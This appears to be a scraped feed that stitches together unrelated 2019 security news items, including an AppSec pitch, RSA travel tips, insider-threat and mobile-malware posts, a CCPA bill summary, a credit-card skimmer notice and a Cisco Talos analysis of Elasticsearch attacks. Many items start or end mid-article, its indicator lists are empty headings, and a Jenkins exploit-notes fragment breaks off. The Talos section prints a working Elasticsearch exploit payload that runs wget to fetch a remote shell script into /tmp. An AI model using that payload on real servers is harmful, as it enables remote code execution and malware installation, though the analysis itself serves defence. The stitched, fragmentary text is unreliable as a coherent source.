Easily accommodate large and distributed teams: In today’s environment, teams are rarely in one location. With cloud solutions, disparate teams can work seamlessly together.
Cumbersome to scale: When an on-premises application security program needs to be scaled, enterprises frequently need to track down more of these hard-to-find security specialists, in addition to installing more servers.
Continuously learning and improving: Unlike an on-premises AppSec solution, a cloud-based solution is continuously gathering more information, learning, and improving. With this feature, it’s less likely that developers will get bogged down with false positives because the platform is continuously learning to adapt to evolving threats.
Mobile access: Mobile access is available with a cloud solution, but not always with an on-premises solution.
As progressive organizations seek the best possible solution for addressing the challenge of application security, they’re looking for speed, scale, and simplicity. These are the exact limitations of on-premises software. So why are some companies still holding on to a thing of the past?
In conclusion, let’s keep the 80’s where they belong, back in the 80’s (except for some of the music, some of the music is worth keeping).
Need more convincing? Check out some of the related content below.
Guide: Cloud vs. On-Premises Guide
Headed to RSA? Here are some ideas of things to do!
RSA Conference 2019 is just around the corner! Make the most of your time in San Francisco by filling your time with some classic San Francisco activities, and of course, making time for some show-related activities.
5. Ghirardelli Square
Stop by for something sweet at the a National Historic site – Ghirardelli Square. Explore unique shops and restaurants at one of San Francisco’s most iconic landmarks.
4. Pier 39
Take in stunning views, enjoy local musicians, and see some bathing sea lions! Check out Pier 39 for a variety of activities and local San Franciscan culture.
Many people call Chinatown “San Francisco’s Most Iconic Neighborhood.” Explore one of the largest hubs of Asian culture in the US for a taste of amazing food and Chinese architecture.
2. Ferry Building
San Francisco’s most iconic landmark is a can’t-miss spot. Enjoy food from local merchants and soak up the historical impact of the world class San Francisco Ferry Building.
1. See a Demo and Party with Us!
We’ll be in North Hall, Booth# 6570 all week at RSA Conference. Stop by our booth to get a demo of our platform and grab one of our famous t-shirts! Looking for after hours fun? People are still talking about the party of the century – aka our party at RSA 2018. Don’t miss out on the this year’s event! We’re partnered with DomainTools and Tessian to bring you a night you won’t forget. RSVP here.
The post 5 Things to Do at RSA 2019 appeared first on ThreatConnect | Intelligence-Driven Security Operations.
With many IT projects, security is often an afterthought, but that approach puts the business at significant risk. The rise of IoT adds orders of magnitude more devices to a network, which creates many more entry points for threat actors to breach. A bigger problem is that many IoT devices are easier to hack than traditional IT devices, making them the endpoint of choice for the bad guys.
IoT is widely deployed in a few industries, but it is in the early innings still for most businesses. For those just starting out, IT and security leaders should be laying out their security plans for their implementations now. However, the landscape of security is wide and confusing so how to secure an IoT deployment may not be obvious. Below are three things you must consider when creating an IoT security plan.
Worse, attackers have already been spotted targeting the flaw to deliver cryptocurrency miners and other payloads
The post ‘Highly critical’ bug exposes unpatched Drupal sites to attacks appeared first on WeLiveSecurity
In late November, KeepSolid rolled out VPN Unlimited 5.0 for Mac and Windows. Where the previous version of VPN Unlimited was a mess of options and information overload, VPN Unlimited 5.0 is more streamlined to help you get online faster.
Overall, KeepSolid is a pretty good service with reliable but not blazing fast speeds. It’s also a good platform for accessing streaming services like Netflix, whether you’re overseas or just securing your connection at an airport.
Note: This review is part of our best VPNs roundup. Go there for details about competing products and how we tested them.
Following the revelation that a list containing millions of stolen usernames and passwords had appeared online, we tell you a few different ways to find out if your credentials were stolen in that—or any other—security breach
The post How to spot if your password was stolen in a security breach appeared first on WeLiveSecurity
Healthcare has traditionally had a weaker security profile than most other industries. On the one hand, it is a favorite target for ransomware attacks, and for hackers looking to steal confidential patient records that have a high resale value on the black market. On the other, healthcare experiences more insider attacks than any other industry.
Recent research reveals that healthcare companies face their biggest threats from malicious insiders that abuse their access privileges to view or exfiltrate personally identifiable information (PII) and protected health information (PHI) data. Verizon’s 2018 Protected Health Information Data Breach Report noted that 58 percent of data breaches in healthcare stem from employees or contractors.
Clearly, payers and providers are severely challenged to prevent both insider and outsider attacks on patient and corporate data.
To limit these threats, progressive organizations are using real-time analytics and risk-scoring to automate security controls. This approach monitors the behavior of users and devices, and applies analytics to risk-score them. When anomalies from normal patterns are detected, the risk score increases.
The Insider Threat Landscape Insider threats pose the biggest challenges to healthcare organizations because they can happen without triggering any security alarms.
A trusted employee can steal confidential patient and corporate information, or tamper with it, and even sabotage systems. While many insider attacks are carried out by disgruntled employees, some can be unintended or simply human error. For example, an employee might mistakenly send confidential information to another employee or to an outsider, or give network access to someone who should not have it.
In some cases, outsiders use social engineering to trick employees into giving up their account credentials. Such ploys include a spoofed email, phishing scheme or a “call from IT” seeking a person’s ID and password.
Top Insider Violations Some of the most common insider threat incidents in healthcare include:
- Snooping on the medical records of friends, family, neighbors, and celebrities
- Sending sensitive data to personal accounts, competitors, or bad actors
- Printing, downloading and exporting patient records and reports
Most of these activities can be partially addressed by monitoring activity logs from Electronic Medical Records (EMR) Systems such as Allscripts, Cerner, and Epic and from security tools including firewalls, VPNs, etc. However, manual monitoring is incapable of identifying and remediating threats in real-time. This is where data analytics come into play.
Security analytics powered by machine learning enables healthcare organizations to analyze large volumes of data in real time and to predict anomalous behaviors. Machine learning uses historical data to create behavior baselines for users, devices, and other entities.
These baselines, which are used to identify deviations from normal patterns, are self-adjusting and change as the user and entity behaviors change. Such capabilities can be used not just to monitor behaviors, but to assign risk scores to individual users and devices — resulting in highly accurate information that singles out potentially risky activity in real time.
Analytics and risk scoring facilitate the automation and orchestration of security decisions. Sometimes called model-driven security, this approach can respond to threats with the speed and accuracy of a machine by enforcing new controls when activity exceeds pre-determined risk thresholds.
Real-time Detection and Prevention of Insider Threats As a real-time security control, model-driven security collects all enterprise intelligence data that can be correlated back to a single user identity such as proxy logs, entitlements, actions taken using those entitlements, and basically anything they can bring back into a data warehouse. Then, behavioral models are applied to the data to develop a risk score for users within the company.
Risk scores are like credit scores. The same way a credit score goes up and down depending on money owed and payment history, a user’s risk score goes fluctuates depending on the actions taken while using their access permissions. The risk score is adjusted dynamically, based on a user’s behavior.
In this way, an insider’s risk score can serve as a dynamic security control. If the score is high, the organization can block the user’s account. Or, if it’s medium-risk, the user can be prompted to call in to the help desk to verify his or her identity. This has been historically impossible to do without the ability to risk score users dynamically. When a user’s risk score increases in a short amount of time, or exceeds a threshold, the organization can send out an alert, lock an IP address, restrict all traffic via DLP, open a security incident, etc.
Risk-scoring using analytics enables healthcare organizations to predict, detect and prevent insider threats, in ways that are impossible using static rules. It reduces much of the friction imposed by conventional security mechanisms, while providing continuous risk monitoring and real-time intervention when and where warranted.
About the author: Nilesh Dherange is CTO of security and fraud analytics vendor Gurucul, and an expert on identity, data science and machine learning. Nilesh was an integral member of identity technology vendor Vaau, which was acquired by Sun Microsystems. He also co-founded BON Marketing Group and created BON Ticker — a predictive analytics tool for online advertising.Copyright 2010 Respective Author at Infosec Island
These days, cyberattacks can feel relentless. Due to the interconnected nature of the world we live in, cybercriminals have managed to infiltrate our personal devices, our networks, and even our homes. That’s why we at McAfee believe it’s important now more than ever to secure every facet of the modern consumer lifestyle. And we’ve partnered with Telefónica to do just that.
This partnership first began back in February of last year, when ElevenPaths, Telefónica Cyber Security Unit, and McAfee announced we’re working together to reinforce the online security of Telefónica’s broadband and mobile customers across multiple markets. This partnership covers Europe and Latin America with plans to progressively roll out solutions in the different countries where Telefónica operates. It’s the first time a telecommunications company has delivered a security service to all of its customers, regardless of where they connect from. Fast forward to present day, and this partnership has only expanded. The global product developed by Telefónica and powered by McAfee was first launched in Spain as Movistar Conexión Segura, a service that protects home and mobile customers’ connectivity. Telefónica protects Fusión customers’ home connections with a smart router, thanks to the ElevenPaths solution powered by McAfee Secure Home Platform, which enables seamless security and easy activation. Conexión Segura is also available for Movistar mobile customers, including network protection and one license of Seguridad Dispositivo, a multi-device security protection. Only a few weeks after Spain, Movistar Argentina launched the solution for its fixed and mobile customers. These services help realize Telefónica’s “Security by Default” strategy, offering customers a more robust security solution that protects against threats like viruses, malware, phishing, and emerging IoT threats.
Telefónica and McAfee’s 360 partnership is dedicated to protecting the productivity of consumers everywhere. “This agreement gives customers current and contextual information on their cybersecurity status so they can stay connected with confidence,” said Pedro Pablo Pérez, Global Security VP of Telefónica and CEO of ElevenPaths, Telefónica Cybersecurity Unit.
ElevenPaths and Mcafee’s joint vision to create a more secure tomorrow brings us a step closer to stopping widespread cyberattacks. By joining forces to implement more robust security solutions around the world, we can ensure that our connectivity goes undisrupted. Because together is power.
The post McAfee Partners With Telefónica To Help Secure Consumers Worldwide appeared first on McAfee Blogs.
This time last year, we said that 2018 would be the year of mobile malware.
Today at MWC, we’re calling 2019 the year of everywhere malware.
In their quest for profit, criminals are constantly forced to shift their tactics and adapt to a changing mobile market. Take crypto-mining, for example. A year ago this was a relatively hassle-free way of making money. But the bottom dropped out of the crypto-currency market over the course of 2018. Now it’s not as lucrative, so we witness more aggressive forms of ransomware that make payment more likely.
Our latest Mobile Threat Report has revealed a huge increase in backdoors, fake apps and banking Trojans. Hidden apps are being exploited as quickly as app stores can take them down and adversaries are adapting and developing new threats. The number of attacks on other connected things is growing too – your voice assistant might even be letting criminals into your home. And smartphones, of course, remain a prime target.
In particular, the use of banking Trojans to steal financial credentials has exploded. Their popularity is growing so fast that we saw the number of incidents double between June and September last year. They then spiked by a further 75 percent in December. Android users in particular are being targeted, as malware authors find new ways of bypassing Google’s security. Unfortunately for consumers, these Trojans represent a solid source of income for cybercriminals so, for the foreseeable future at least, we can expect them to continue to evolve and become more sophisticated.
A worrying new trend sees attacks extending beyond mobile apps and operating systems and into our homes. Smart home tech is becoming integral to our domestic lifestyle – there are already over 25 million voice assistants such as Google Home and Alexa in our homes, and this is expected to grow to as many as 275 million within the next five years. Add to this a growing number of connected thermostats, locks and doorbells, and this represents a huge – and hugely attractive – attack vector for cybercriminals. The quirks and vulnerabilities of these devices, coupled with weak to non-existent security controls could provide unfettered access to the rest of your home network.
At the heart of all of this, of course, lies the smartphone. The control hub and gateway to the voice assistants and smart devices we engage with on a day-to-day basis, these devices track where we are, what we’re doing, and often hold important personal information. Access to our smartphones is clearly worth its weight in gold to criminals. After all, from here they steal our bank details and even make their way into our homes. And with new malware families especially designed to trick smartphone users into giving them access, that’s just what they’re trying to do.
The mobile ecosystem is continually changing. Operators and developers can get wise to tactics used by criminals but criminals will never give up in their pursuit for profit. If one door closes on them, they’ll just open another one. They’ll change their tactics and broaden their efforts to target more aspects of our increasingly ubiquitous mobile use.
That’s why the entire tech industry, from the manufacturers of smart device manufacturers and mobile devices to developers and app store owners, must work more closely. Only then will we be able to tackle this insidious threat and protect consumers at every point of their increasingly digital life.
To find out more, see our latest Mobile Threat Report here.
The post In 2019 the Threat is “Everywhere Malware”, Not just Mobile Malware appeared first on McAfee Blogs.
So what is wild on the web this year? Need to know about the most critical web vulnerabilities in 2019 to protect your organization?
Well luckily for you Acunetix compiles an annual web application vulnerability report which is a fairly hefty piece of analysis on data gathered from the previous year. This is compiled from the automated web and network perimeter scans run on the Acunetix Online platform, over a 12 month period, across more than 10,000 scan targets.
- A number of ongoing out-in-the-wild attacks
- Another early-warned Drupal vulnerability
- A 19-year old flaw in an obscure decompress for the "ACE" archive format
- Microsoft reveals an abuse of HTTP/2 protocol which is DoSing its IIS servers.
- Mozilla faces a dilemma about a wanna-be Certificate Authority and they also send a worried letter to Australia.
- Microsoft's Edge browser is revealed to be secretly whitelisting 58 web domains which are allowed to bypass its "Click-To-Run" permission for Flash.
- ICANN renews its plea for the Internet to adopt DNSSEC.
- NVIDIA releases a handful of critical driver updates for Windows.
- Apple increases the intelligence of it's Intelligent Tracking Prevention.
We invite you to read our show notes at https://www.grc.com/sn/SN-703-Notes.pdf
Download or subscribe to this show at https://twit.tv/shows/security-now.
You can submit a question to Security Now! at the GRC Feedback Page.
Journalists covering the arrival of caravans of migrants from Central America along the U.S. southern border have faced harassment, additional screenings, and targeting by both U.S. and Mexican authorities.
The U.S. Press Freedom Tracker has documented at least five journalists who have been stopped on the U.S. side of the border since December 2018 in the course of doing their jobs covering the migrant caravan. Some have been stopped numerous times, where they are put in situations that could threaten their privacy, reporting processes, and confidential sources.
In addition, Mexican authorities denied entry to at least two journalists — along with two immigration attorneys — who were attempting to travel to the country last month, making headlines and sparking concerns about public access and press freedom issues along the border.
The journalists’ — Kitra Cahana and Daniel Ochoa — and the attorneys’ accounts of what happened were nearly identical. Mexican authorities detained them when they attempted to enter, informed them that their passports were “flagged,” and then turned them away.
“I’m in limbo,” Cahana told the Los Angeles Times. “What kind of list am I on? Who put me on this list? And how many journalists is this affecting?”
It’s unclear whether it was the Mexican or United States government that placed an alert on their travel documents, but both journalists reported that their passports had previously been photographed by both U.S. and Mexican authorities.
These passport alerts have not only impacted journalists trying to enter Mexico, but also those attempting to enter the United States. While entering the country via San Diego at the end of last year, freelance journalist Ariana Drehsler was told by border authorities that her passport had been flagged, but that they did not know why.
Customs and Border Protection did not provide details on what these “flags” on passports like Drehsler’s might be or why they may have been placed. But since then, she has been subjected to secondary screenings — including questionings that made her feel like “an informant,” and searches — every time she has entered the United States. She isn’t the only one.
Manuel Rapalo, a journalist who freelances for Al Jazeera, said he has been stopped at least three times at the U.S.-Mexico border in 2019. (Read details about each border stop on the US Press Freedom Tracker.)
Out of concern about the frequency of equipment searches during these stops, he said he has changed his behavior to ensure his sources and reporting materials are protected. He brings new memory cards with him on each reporting trip to minimize what material could end up in border officials’ hands.
The numerous journalists stopped at the border and questioned about their work while covering the arrival of Central American immigrants to Mexico aren’t the only ones that have been targeted by CBP recently. In January, a filmmaker had his device taken by order officials, who demanded he unlock his phone and then took it into a different room. And when an Al-Jazeera anchor had his device seized at the border, CBP agents asked him about his social media accounts.
A recent report by the Committee to Protect Journalists found that between 2006 and June 2018, the 37 journalists surveyed for the report were collectively stopped for screenings more than 110 times. In many cases, journalists were asked to unlock their electronic devices, answer invasive questions about their reporting, and had their personal belongings searched. In a particularly egregious case in 2016, well-known photojournalist and Canadian citizen Ed Ou was even denied entry into the United States.
CPJ found that CBP’s broad and relatively unchecked powers pose a significant press freedom threat — particular since the agency can share the information it gains for journalists’ devices with other federal agencies, including sources and sensitive documents.
“With a more aggressive administration openly hostile to the press and leaks, CBP should implement tighter guidelines to protect the First Amendment rights of all individuals crossing the border,” CPJ concluded.
“Press freedom rights should not cease at the border,” said Freedom of the Press Executive Director Trevor Timm. “These egregious and invasive border stops are a threat to both journalists and their sources, and they give authoritarian countries every excuse to use similar tactics on their borders as well. CBP and the Trump administration need to publicly account for these disturbing events.”
The BRONZE UNION threat group focuses on espionage and targets a broad range of organizations and groups using a variety of tools and methods.
The BRONZE UNION threat group focuses on espionage and targets a broad range of organizations and groups using a variety of tools and methods.
A recent phishing campaign used a fake Google reCAPTCHA as part of its efforts to target Polish bank employees with malware.
Sucuri researchers discovered that the campaign sent out malicious emails masquerading as a confirmation for a recent transaction. Digital attackers deployed this disguise in the hopes that employees at the targeted bank would click on a link to a malicious PHP file out of alarm. That file was responsible for loading a fake 404 error page for visitors that had specifically defined user-agents.
At that point, the PHP code checked the victim’s browser user-agent to determine what payload it should deliver. If it found the victim was using an Android device, the attack would load a malicious APK file capable of intercepting two-factor authentication (2FA) codes. Otherwise, it would download a malicious ZIP archive.
A History of Abusing and Bypassing CAPTCHAs
This isn’t the first time threat actors have incorporated CAPTCHAs into their attack campaigns. Back in 2016, researchers at the University of Connecticut and Bar Ilan University identified a malicious attack in which threat actors could trick users into divulging some of their personal information by completing a fake CAPTCHA. In February 2018, My Online Security observed a campaign that used an image pretending to be a Google reCAPTCHA to download a malicious ZIP file.
Malefactors have also tried to bypass legitimate CAPTCHAs for the purpose of conducting attack campaigns. All the way back in 2009, for example, IT World reported on a worm named Gaptcha that circumvented Gmail’s authentication feature to create new dummy accounts from which to send spam mail. More recently, BullGuard discovered some survey scams using CAPTCHAs to make their ploys more believable.
Defending Against Fake reCAPTCHA Phishing Campaigns
Security professionals can help protect their organizations from fake reCAPTCHA-wielding phishing campaigns by taking an ahead-of-threat approach to detection. Companies should also reject SMS-based 2FA schemes in favor of more practical and convenient multifactor authentication (MFA) deployments that fit into a context-based access strategy.
The post Phishing Campaign Uses Fake Google reCAPTCHA to Distribute Malware appeared first on Security Intelligence.
On February 22, 2019, California state senator Hannah Beth-Jackson introduced a bill (SB-561) that would amend the California Consumer Privacy Act of 2018 (“CCPA”) to expand the Act’s private right of action and remove the 30-day cure period requirement for enforcement actions brought by the State Attorney General. The bill would not change the compliance deadline for the CCPA, which remains January 1, 2020. California Attorney General Xavier Becerra supports the amendment bill, characterizing it as “a critical measure to strengthen and clarify the CCPA.”
If passed, the bill would amend the CCPA as follows:
- Private Right of Action
- Expand the civil right of action for damages to apply to any consumer whose rights under the CCPA are violated.
- The private right of action under the CCPA is currently limited to instances in which a consumer’s nonencrypted or nonredacted personal information is subject to unauthorized access and exfiltration, theft or disclosure as a result of a business’s failure to maintain reasonable security procedures.
- The proposed amendment would allow consumers whose rights under the CCPA are violated to bring a private right of action against a business.
- No other sections of the private right of action provision would change.
- Penalties for violations of the Act remain unchanged:
- $100-$750 per consumer per incident or actual damages, whichever is greater;
- Injunctive or declaratory relief; and
- Any other relief the court deems proper.
- 30-day cure period provision remains unchanged:
- For an action for statutory damages, a consumer must still provide a business with 30 days’ written notice and an opportunity to cure the violation. If within the 30 days the business cures the violation and provides the consumer an express written statement that the violations have been cured and that no further violations shall occur, the consumer would be barred from bringing an action for individual statutory damages or class-wide statutory damages.
- For an action for actual damages, as under the current language of the CCPA, a consumer is not required to provide a business with 30 days’ notice and an opportunity to cure.
- Penalties for violations of the Act remain unchanged:
- Expand the civil right of action for damages to apply to any consumer whose rights under the CCPA are violated.
- California Attorney General Enforcement
- Remove the 30-day cure period for enforcement actions brought by the California Attorney General.
- The CCPA currently states that a business shall only be in violation of the CCPA if it fails to cure any alleged violation of the CCPA within 30 days after being notified of alleged noncompliance.
- The proposed amendment would remove this provision, allowing the California Attorney General to bring enforcement actions for violations of the CCPA even when a business has “cured” the alleged violations.
- End the ability to seek guidance from the California Attorney General about how to comply with the CCPA.
- The CCPA currently provides the opportunity for any business or third party to seek the opinion of the California Attorney General for guidance on how to comply with the CCPA.
- The bill would eliminate this provision and instead state that the Attorney General “may publish materials that provide businesses and others with general guidance” on how to comply with the CCPA.
- The penalties the California Attorney General can bring for violations of the CCPA remain the same:
- Injunction; and
- Civil penalties of up to $2,500 for each violation or $7,500 for each intentional violation.
- Remove the 30-day cure period for enforcement actions brought by the California Attorney General.
If passed, the expanded private right of action provision would significantly increase businesses’ liability risks under the CCPA. While the California Attorney General is limited in his ability to bring enforcement actions until six months after the passage of implementing regulations or July 1, 2020, whichever comes first, consumers may bring private rights of action beginning on January 1, 2020, the CCPA’s compliance deadline. Businesses therefore should be prepared to comply with the CCPA by January 1, 2020.
Over the last few months, we’ve noticed several credit card-stealing scripts that use variations of the Google Analytics name to make them look less suspicious and evade detection by website owners.
The malicious code is obfuscated and injected into legitimate JS files, such as skin/frontend/default/theme122k/js/jquery.jscrollpane.min.js, js/meigee/jquery.min.js, and js/varien/js.js.
The obfuscated code loads another script from www.google-analytics[.]cm/analytics.js.
Posted by Rahul Mishra and Tom Watkins, Android Security & Privacy Team
[Cross-posted from the Android Developers Blog]
In 2018, Google Play Protect made Android devices running Google Play some of the most secure smartphones available, scanning over 50 billion apps everyday for harmful behaviour.
Android devices can genuinely improve people's lives through our accessibility features, Google Assistant, digital wellbeing, Family Link, and more — but we can only do this if they are safe and secure enough to earn users' long term trust. This is Google Play Protect's charter and we're encouraged by this past year's advancements.
Google Play Protect, a refresherGoogle Play Protect is the technology we use to ensure that any device shipping with the Google Play Store is secured against potentially harmful applications (PHA). It is made up of a giant backend scanning engine to aid our analysts in sourcing and vetting applications made available on the Play Store, and built-in protection that scans apps on users' devices, immobilizing PHA and warning users.
This technology protects over 2 billion devices in the Android ecosystem every day.
What's newOn by default
We strongly believe that security should be a built-in feature of every device, not something a user needs to find and enable. When security features function at their best, most users do not need to be aware of them. To this end, we are pleased to announce that Google Play Protect is now enabled by default to secure all new devices, right out of the box. The user is notified that Google Play Protect is running, and has the option to turn it off whenever desired.
New and rare apps
Android is deployed in many diverse ways across many different users. We know that the ecosystem would not be as powerful and vibrant as it is today without an equally diverse array of apps to choose from. But installing new apps, especially from unknown sources, can carry risk.
Last year we launched a new feature that notifies users when they are installing new or rare apps that are rarely installed in the ecosystem. In these scenarios, the feature shows a warning, giving users pause to consider whether they want to trust this app, and advising them to take additional care and check the source of installation. Once Google has fully analyzed the app and determined that it is not harmful, the notification will no longer display. In 2018, this warning showed around 100,000 times per day
Context is everything: warning users on launch
It's easy to misunderstand alerts when presented out of context. We're trained to click through notifications without reading them and get back to what we were doing as quickly as possible. We know that providing timely and context-sensitive alerts to users is critical for them to be of value. We recently enabled a security feature first introduced in Android Oreo which warns users when they are about to launch a potentially harmful app on their device.
This new warning dialog provides in-context information about which app the user is about to launch, why we think it may be harmful and what might happen if they open the app. We also provide clear guidance on what to do next. These in-context dialogs ensure users are protected even if they accidentally missed an alert.
Google Play Protect has long been able to disable the most harmful categories of apps on users devices automatically, providing robust protection where we believe harm will be done.
In 2018, we extended this coverage to apps installed from Play that were later found to have violated Google Play's policies, e.g. on privacy, deceptive behavior or content. These apps have been suspended and removed from the Google Play Store.
This does not remove the app from user device, but it does notify the user and prevents them from opening the app accidentally. The notification gives the option to remove the app entirely.
Keeping the Android ecosystem secure is no easy task, but we firmly believe that Google Play Protect is an important security layer that's used to protect users devices and their data while maintaining the freedom, diversity and openness that makes Android, well, Android.
Acknowledgements: This post leveraged contributions from Meghan Kelly and William Luh.
Christopher Evans of Cisco Talos conducted the research for this post.
Cisco Talos warns users that they need to keep a close eye on unsecured Elasticsearch clusters. We have recently observed a spike in attacks from multiple threat actors targeting these clusters. These attackers are targeting clusters using versions 1.4.2 and lower, and are leveraging old vulnerabilities to pass scripts to search queries and drop the attacker's payloads. These scripts are being leveraged to drop both malware and cryptocurrency miners on victim machines. Talos has also been able to identify social media accounts associated with one of these threat actors. Because Elasticsearch is typically used to manage very large datasets, the repercussions of a successful attack on a cluster could be devastating due to the amount of data present. This post details the attack methods used by each threat actor, as well as the associated payloads.
Through ongoing analysis of honeypot traffic, Talos detected an increase in attacks targeting unsecured Elasticsearch clusters. These attacks leverage CVE-2014-3120 and CVE-2015-1427, both of which are only present in old versions of Elasticsearch and exploit the ability to pass scripts to search queries. Based on patterns in the payloads and exploit chains, Talos assesses with moderate confidence that six distinct actors are exploiting our honeypots.
For example CVE-2015-1427:
"script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"wget http://18.104.22.168:8506/IOFoqIgyC0zmf2UR/uuu.sh -P /tmp/sssooo\").getText()"
The most active of these actors consistently deploys two distinct payloads with the initial exploit, always using CVE-2015-1427. The first payload invokes wget to download a bash script, while the second payload uses obfuscated Java to invoke bash and download the same bash script with wget. This is likely an attempt to make the exploit work on a broader variety of platforms. The bash script utilized by the attacker follows a commonly observed pattern of disabling security protections and killing a variety of other malicious processes (primarily other mining malware), before placing its RSA key in the authorized_keys file. Additionally, this bash script serves to download illicit miners and their configuration files. The script achieves persistence by installing shell scripts as cron jobs.
This bash script also downloads a UPX-packed ELF executable. Analysis of the unpacked sample reveals that this executable contains exploits for a variety of other systems. These additional exploits include several vulnerabilities, all of which could lead to remote code execution, such as CVE-2018-7600 in Drupal, CVE-2017-10271 in Oracle WebLogic, and CVE-2018-1273 in Spring Data Commons. The exploits are sent, typically via HTTPS, to the targeted systems. As evidenced by each of these exploits, the attacker's goal appears to be obtaining remote code execution on targeted machines. Detailed analysis of the payload sample is ongoing, and Talos will provide pertinent updates as necessary.
Talos observed a second actor exploiting CVE-2014-3120, using it to deliver a payload that is derivative of the Bill Gates distributed denial-of-service malware. The reappearance of this malware is notable because, while Talos has previously observed this malware in our honeypots, the majority of actors have transitioned away from the DDoS malware and pivoted toward illicit miners.
A third actor attempts to download a file named "LinuxT" from an HTTP file server using exploits targeting CVE-2014-3120. The LinuxT file is no longer hosted on the command and control (C2) server despite continued exploits requesting the file, although several other malicious files are still being hosted. All of these files are detected by ClamAV as variants of the Spike trojan and are intended to run on x86, MIPS and ARM architectures.
As part of our research, we observed that, in some cases, hosts that attempted to download the "LinuxT" sample also dropped payloads that executed the command "echo 'qq952135763.'" This behavior has been seen in elastic search error logs going back several years. QQ is a popular Chinese social media website, and it is possible that this is referencing a QQ account. We briefly reviewed the public account activity of 952135763 and found several posts related to cybersecurity and exploitation, but nothing specific to this activity. While this information could potentially shed more light on the attacker, there is insufficient information currently to draw any firm conclusions.
Our honeypots also detected additional hosts exploiting Elasticsearch to drop payloads that execute both "echo 'qq952135763'" and "echo '952135763,'" suggesting that the attacks are related to the same QQ account. However, none of the IPs associated with these attacks have been observed attempting to download the "LinuxT" payload linked to this attacker. Additionally, unlike other activity associated with this attacker, these attacks leveraged the newer Elasticsearch vulnerability rather than the older one.
The three remaining actors that Talos identified have not been observed delivering any malware through their exploits. One actor issued an "rm *" command, while the other two actors were fingerprinting vulnerable servers by issuing 'whoami' and 'id' commands.
Talos has observed multiple attackers exploiting CVE-2014-3120 and CVE-2015-1427 in our Elasticsearch honeypots to drop a variety of malicious payloads. Additionally, Talos has identified some social media accounts we believe could belong to the threat actor dropping the "LinuxT" payload. These Elasticsearch vulnerabilities only exist in versions 1.4.2 and lower, so any cluster running a modern version of Elasticsearch is unaffected by these vulnerabilities. Given the size and sensitivity of the data sets these clusters contain, the impact of a breach of this nature could be severe. Talos urges readers to patch and upgrade to a newer version of Elasticsearch if at all possible. Additionally, Talos highly recommends disabling the ability to send scripts through search queries if that ability is not strictly necessary for your use cases.
The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.
CVE-2014-3120: 33830, 36256, 44690
Additional ways our customers can detect and block this threat are listed below.
Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.
Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.
Email Security can block malicious emails sent by threat actors as part of their campaign.
Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.
AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.
Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.
Attacking IP addresses:
IP addresses and ports hosting malware:
SHA256 of delivered malware:
Attacking IP address:
IP address and port hosting malware:
SHA256 of delivered malware:
Attacking IP addresses:
IP addresses linked to QQ account, but not delivering malware:
IP address and port hosting malware:
SHA256 of malware hosted on above IP address:
7f18c8beb8e37ce41de1619b2d67eb600ace062e23ac5a5d9a9b2b3dfaccf79b dac92c84ccbb88f058b61deadb34a511e320affa7424f3951169cba50d700500 e5a04653a3bfbac53cbb40a8857f81c8ec70927a968cb62e32fd36143a6437fc d3447f001a6361c8454c9e560a6ca11e825ed17f63813074621846c43d6571ba 709d04dd39dd7f214f3711f7795337fbb1c2e837dddd24e6d426a0d6c306618e 830db6a2a6782812848f43a4e1229847d92a592671879ff849bc9cf08259ba6a
Attacking IP addresses:
to download old jenkins WAR files
1st bug in the blog is a username enumeration bug in
Even though the advisory says 2.138_1 i tested against 2.138 and the exploit doesn't work.
SOOOOO you are looking for Jenkins <= 2.137
If jenkins is really old the above should work and also https://nvd.nist.gov/vuln/detail/CVE-2017-1000395 where you can get the email address via similar query.
- versions up to (including) 2.73.1
- versions up to (including) 2.83
with 2.137 you can get username/id
A recently discovered threat actor was observed targeting a Middle Eastern government agency on several occasions over the course of last year, Palo Alto Networks security researchers reveal.
Referred to as WINDSHIFT, the surveillance-focused threat actor is believed to have remained unnoticed for a long time, and to have hacked other actors to re-use their malware, which helped it stay unnoticed.
In a report from last year (PDF), Dark Matter said WINDSHIFT was observed launching sophisticated and unpredictable spear-phishing attacks against specific individuals and rarely targeting corporate environments.
The group’s Tactics, Techniques and Procedures (TTPs) were said to resemble those of Bahamut, a threat actor security researchers also linked to Urpage last year.
Following a long recon period, which could take several years, the group would attempt to steal the victim’s credentials by sending fake emails prompting the victim to reset their password for Gmail , Apple iCloud, Etisalat (main ISP in UAE), or professional emails.
Should the credential harvesting fail, the actor then attempts to infect the victim with malware, also via email. The actor would then attempt to erase all traces of the attacks by shifting to a new infrastructure, gaining access to new malware, and shutting down malicious domains.
The cyber-espionage group is known to be using macOS-targeting malware, namely WINDTAIL backdoor for file exfiltration, WINDTAPE backdoor for taking screenshots, and WINDTAIL downloader for WINDTAPE. The group is also believed to be using WINDDROP, a Windows-targeting downloader.
Now, Palo Alto Networks saysit has observed WINDSHIFTattacks unfolded at a Middle Eastern government agency between January and May of 2018.
In early January 2018, an initial attack featuring a WINDTAIL sample was observed originating from the remote IP address 109.235.51[.]110 to a single internal IP address within the government agency.
The IP was associated with the domain flux2key[.]com, and the malware’s command and control (C&C) server IP address 109.235.51[.]153 was associated with the domain string2me[.]com, both known WINDSHIFT domains.
Palo Alto Networks says that several other WINDTAIL samples originating from 109.235.51[.]110 were observed being directed at the same internal IP address from January through May 2018.
All related WINDTAIL samples were Mac OSX app bundles in zip archives. One of them had C&C server IP address 185.25.50[.]189, which was associated with the domain domforworld[.]com at the time of activity.
Palo Alto Networks says it “assesses with high confidence that both the IP address 25.50[.]189 and the domain domforworld[.]com is associated with WINDSHIFT activity. Additionally, the IP addresses 109.235.51[.]110 and 109.235.51[.]153, corresponding to the previously validated WINDSHIFT domains flux2key[.]com and string2me[.]com, respectively, were also observed in use during this campaign.”
One of the attacker-owned IP addresses (109.235.50[.]191) was previously associated with Operation Hangover (which was analyzed several years ago), strengthening the previously identified relation between Operation Hangover and WINDSHIFT activity.
Palo Alto Networks also believes the attackers were unable to establish persistence within the targeted environment, given the multiple inbound WINDTAIL samples directed at the same internal IP address.Infosec Island
